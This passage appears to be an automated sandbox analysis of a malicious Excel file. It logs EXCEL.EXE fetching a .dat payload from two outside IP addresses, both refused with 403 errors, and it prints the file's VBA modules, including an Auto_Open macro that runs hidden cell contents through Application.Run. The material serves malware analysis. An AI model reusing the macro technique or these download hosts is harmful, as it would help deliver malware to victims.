Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 5.34.179.36 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 17:31:37.321652889 CEST | 1 | OUT | GET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 5.34.179.36
Connection: Keep-Alive
May 4, 2021 17:31:37.893150091 CEST | 2 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 15:31:37 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID:2
Source IP:192.168.2.22
Source Port:49167
Destination IP:45.153.229.23
Destination Port:80
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp:May 4, 2021 17:31:37.974946022 CEST
kBytes transferred:3
Direction:OUT
Data:GET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 45.153.229.23
Connection: Keep-Alive
Timestamp:May 4, 2021 17:31:38.095777035 CEST
kBytes transferred:4
Direction:IN
Data:HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 15:31:38 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

System Behavior

General

Start time:17:31:38
Start date:04/05/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f870000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Call Graph

Graph

  • Entrypoint
  • Decryption Function
  • Executed
  • Not Executed
callgraph 2 Auto_Open Run:3,Range:3

Module: Blasr

Declaration
Line  Content
1     Attribute VB_Name = "Blasr"

Executed Functions
APIs   Meta Information
Run    Microsoft Excel:Application.Run()
Range
Run
Range
Run
Range

Strings   Decrypted Strings
"AJ6"
"Nyukasl"
"A5"
"Nyukasl"
"A5"
"Nyukasl"

Line  Instruction                                       Meta Information
2     Private Sub Auto_Open()
3     Application.Run Sheets("Nyukasl").Range("AJ6")    Microsoft Excel:Application.Run(); Range; executed
5     Application.Run Sheets("Nyukasl").Range("A5")     Run; Range
6     Application.Run Sheets("Nyukasl").Range("A5")     Run; Range
13    End Sub

Module: Briks

Declaration
Line  Content
1     Attribute VB_Name = "Briks"
2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True

Module: Byutut

Declaration
Line  Content
1     Attribute VB_Name = "Byutut"

Module: Class1

Declaration
Line  Content
1     Attribute VB_Name = "Class1"
2     Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = False
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Class2

Declaration
Line  Content
1     Attribute VB_Name = "Class2"
2     Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = False
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Class3

Declaration
Line  Content
1     Attribute VB_Name = "Class3"
2     Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = False
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Kikide

Declaration
Line  Content
1     Attribute VB_Name = "Kikide"
2     Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True

Module: UserForm1

Declaration
Line  Content
1     Attribute VB_Name = "UserForm1"
2     Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Vrest

Declaration
Line  Content
1     Attribute VB_Name = "Vrest"

Module: Vsewd

Declaration
Line  Content
1     Attribute VB_Name = "Vsewd"
2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True
